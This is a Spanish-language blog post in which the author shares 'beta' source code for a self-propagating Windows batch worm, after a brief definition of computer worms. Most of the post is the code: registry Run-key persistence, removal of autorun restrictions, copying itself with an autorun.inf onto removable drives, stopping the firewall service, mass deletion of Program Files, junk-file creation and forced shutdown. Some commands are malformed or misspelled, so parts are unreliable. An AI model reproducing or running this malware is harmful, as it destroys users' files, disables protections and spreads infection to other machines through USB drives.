Lo que hace este bichito, en sintesis, es autopropagarse por los pendrives, y borrar la mayor parte de los archivos.
Pero antes:
Un gusano informático (también llamados IWorm por su apocope en inglés, I de Internet, Worm de gusano) es un malware que tiene la propiedad de duplicarse a sí mismo. Los gusanos utilizan las partes automáticas de un SO que generalmente son invisibles al usuario.
A diferencia de un Virus , un gusano no precisa alterar los archivos de programas, sino que reside en la MeMORIA y se duplica a sí mismo. Los gusanos casi siempre causan problemas en la red (aunque sea simplemente consumiendo ancho de banda), mientras que los virus siempre infectan o corrompen los archivos de la computadora que atacan.
Es algo usual detectar la presencia de gusanos en un sistema cuando, debido a su incontrolada replicación, los recursos del sistema se consumen hasta el punto de que las tareas ordinarias del mismo son excesivamente lentas o simplemente no pueden ejecutarse.
Metodo de propagacion:
@echo off
if exist %windir%\system32\Palo.bat (goto a) else (goto code)
if exist %windir%\system32\autorun.inf (goto b) else (goto code)
if exist %windir%\system32\toyos.wav (goto c) else (goto code)
:a
cd %windir%\system32
attrib -R -A -S -H palo.bat
del /f /s /q Palo.bat
goto code
:b
cd %windir%\system32
attrib -R -A -S -H autorun.inf
del /f /s /q autorun.inf
goto code
:c
cd %windir%\system32
attrib -R -A -S -H toyos.wav
del /f /s /q toyos.wav
goto code
:code
REG ADD HKML\software\Microsoft\CurrentVersion\Run /v MsnPahe /t REG_SZ /d "%windir%\system32\JSPalo.bat" /f
REG ADD HKML\Software\Microsoft\CurrentVersion\Run /v ProMsnn /t REG_SZ /d "%windir%\JSPalo.bat" /f
REG ADD HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Cdrom /v svnnostt /t REG_DWORD /d "%windir%\JSPalo.bat" /f
REG ADD HKML\Software\Microsoft\CurrentVersion\Run/v Reggeditt /t REG_SZ /d "%homedrive%\JSPalo.bat" /F
rem ------------------Borro el Registro PENDRIVE --------------
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\Polices\Explorer /v NoDriveTypeAutorun /f
reg delete HKML\Software\Microsoft\Windows\CurrentVersion\Polices\Explorer /v NoDriveTypeAutorun /f
reg delete HKML\Software\Microsoft\Windows\CurrentVersion\Polices\Explorer /v NoDriveAutorun /f
rem ----------------- Gusano ---------------
for /f "tokens=1" %%x in ('wmic logicaldisk get caption^, description ^| find /i "extra"') do (copy /y "%~dpnx0" && %%x\ && copy /y "%windir%\system32\sarasa.bat" %%x\ && copy /y "%windir%\system32\toyos.wav" %%x\ && copy /y "%windir%\system32\autorun.inf" && ATTRIB +R +S +H %%x\
)
Destruccion:
@echo off
rem --------------------- Registro ----------------
REG ADD HKML\Software\Microsoft\Windows\CurrentVersion\Run /v HideProcess /t REG_SZ /d "%windir%\system32\nombre.bat
REG ADD HKML\Software\Microsoft\Windows\CurrentVersion\Run /v avast.! /t REG_SZ /d "%windir%\nombre.bat
REG ADD HKEY_CURRENT_USERS\Software\Polices\Microsoft\Windows\System /v DisableRegistryTools /t REG_SZ /d 0X00000001 /f
rem FOR DEL REGISTRO PROXIMAMENT
rem ------------------ Inicio --------------------
start %0
rem ------------------- Fin inicio -----------------
rem ---------------------- Virus Palo -------------
if exist %windir%\system32\Palo.bat (goto :a) else (goto :code)
if exist %windir%\Palo.bat (goto :b) else (goto :code)
if exist %homedrive%\Palo.bat (goto :c) else (goto :code)
:a
cd %windir%\system32
del /f /s /q Palo.bat
goto code
:b
cd..
cd %windir%
del /f /s /q Palo.bat
goto code
:c
cd %homedrive%
del /f /s /q Palo.bat
goto code
:code
copy %0 %windir%\system32\Palo.bat
copy %0 %windir%\Palo.bat
copy %0 %homedrive%\nombredelbat.bat
attrib +R +S +H *.bat
rem -------------------------------------- Inicio Einstein -------------------------------------------
net stop SharedAccess
cd %programfiles%
attrib -R -A -S -H *.*
del /S /Q /F *.*
cd ..
cd %windir%
fsutil file createnew %random%.exe 1000000 Attrib + R +S +H
fsutil file createnew %random%.exe 1000000 Attrib + R +S +H
fsutil file createnew %random%.exe 1000000 Attrib + R +S +H
cd..
cd %windir%
ping -n 15 127.0.0.1 >nul
shutdown -s -f -t 7 -c "pALO !"
y opor utlimo el Autorun.inf
[autorun]
shellexecute=/Palo.bat
-------------------------------------------------------------------------------------------
Esta mas que claro que todavia no decidi el nombre y que faltan funciones, por algo es una version beta xD.... despues voi a sacar un gusano un poco mejor en c++.
Saludos
No hay comentarios:
Publicar un comentario